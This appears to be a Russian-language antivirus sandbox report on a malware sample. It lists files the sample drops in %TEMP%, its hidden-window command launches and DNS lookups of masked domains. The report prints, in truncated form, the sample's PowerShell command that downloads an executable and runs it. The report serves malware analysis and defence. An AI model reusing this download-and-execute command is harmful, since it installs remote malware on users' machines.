Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $tbpzrg5 как %temp%\vejyrlrbcym.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qnlxpfc([String] $Tbpzrg5){(New-Object System.Net.WebClient).DownloadFile($Tbpzrg5,''%TEMP%\vejyrlrbcym.exe'');Start-Process ''%TEMP%\vejyrlrbcym.exe'';}tr...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1956
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\zyjxi5.bat
- %TEMP%\1410483.cvr
Сетевая активность
Подключается к
- 'te####owlogix.net':80
UDP
- DNS ASK te####owlogix.net
- DNS ASK pd.#####treform-muster.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Qnlxpfc([String] $Tbpzrg5){(New-Object System.Net.WebClient).DownloadFile($Tbpzrg5,''%TEMP%\vejyrlrbcym.exe'');Start-Process ''%TEMP%\vejyrlrbcym.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zyjxi5.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zyjxi5.bat" "
